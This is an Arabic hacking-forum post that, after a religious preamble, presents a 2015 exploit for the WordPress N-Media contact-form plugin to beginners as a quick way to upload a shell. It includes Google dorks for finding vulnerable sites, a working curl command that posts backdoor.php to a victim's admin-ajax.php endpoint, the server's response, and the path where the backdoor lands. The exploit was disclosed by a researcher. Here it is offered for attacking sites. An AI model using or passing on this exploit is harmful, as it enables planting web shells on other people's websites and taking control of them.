عرض مشاركة واحدة
قديم 04-14-2015, 05:18 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
migamix
 
الصورة الرمزية migamix
 

 

 
إحصائية العضو





migamix غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
migamix is on a distinguished road

Cool للمبتدئين رفع الشيل في تواني exploit wordpress shell upload 14/04/2015


الحمد لله الذي لولاه ما جرى قلم , ولا تكلم لسان , والصلاة والسلام على ىسيدنا محمد
( صلى الله عليه واله وصحبة وسلم )كان أفصح الناس لسانا وأوضحهم بياناً .
اللهَم صَل َعلىَ محَمد واَل محَمد
...الصلاة و السلام على أشرف المرسليـن ...
... الحمد لله وحده نحمده و نشكره و نستعينه و نستغفره و نعود بالله من شرور أنفسنا و من سيئات أعمالنا ...
...من يهده الله فلا مظل له و من يظلل فلن تجد له ولياً مرشدا ...
... و أشهد ألا إلاه إلا الله وحده لا شريك له و أن محمداً عبده و رسوله صلى الله عليه و سلم ...
... و على آله و صحبه أجمعين و من تبعهم بإحسان إلى يوم الدين...
...ربنا لا علم لنا إلا ما علمتنا إنك أنت العليم الخبير ...
...ربنا لا فهم لنا إلا ما فهمتنا إنك أنت الجواد الكريم...
...ربي اشرح لي صدري و يسر لي أمري و احلل عقدة من لساني يفقهوا قولي ...
...أما بعد ...
...فإن أصدق الحديث كتاب الله تعالى و خير الهدي هديُ سيدنا محمد صلى الله عليه و سلم...
...و شر الأمور محدثاتها و كل محدثة بدعة و كل بدعة ضلالة و كل ضلالة في النار ...
...فاللهم أجرنا و قنا عذابها برحمتك يا أرحم الراحمين


اليوم مع تغرة بتاريخ 14/04/2015خطيرا جدا تمكن رفع الشيل في تواني


كود:
######################
 
#  exploit  Title :  wordpress  N-Media Website Contact Form with File  upload  1.3.4  shell   upload  Vulnerability
 
#  exploit  Author : Claudio Viviani
 
 
# Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
 
# Date : 2015-04-1
 
# Dork Google: index of website-contact-form-with-file-upload
               index of /uploads/contact_files/
 
# Tested on : Linux BackBox 4.0 / curl 7.35.0
 
#####################
 
# Info :  
 
 The "upload_file()" ajax function is affected from unrestircted file  upload  vulnerability.
 
 
######################
 
# PoC:
 
 curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://VICTIM/wp-admin/admin-ajax.php
  
  
 Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}
 
 
######################
 
# Backdoor Location:
 
 http://VICTIM/wp-content/uploads/contact_files/1427927588-backdoor.php
  
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
            http://ffhd.homelab.it (Free Fuzzy Hashes Database)
                 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################

يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com



gglfj]zdk vtu hgadg td j,hkd exploit wordpress shell upload 14L04L2015

التوقيع

للتواصل
Facebook : MigaMixxDz-Team

 


التعديل الأخير تم بواسطة SoLiTair4Ever ; 04-16-2015 الساعة 03:40 AM. سبب آخر: رابط ربحي + مرفوع على 4shared

   

رد مع اقتباس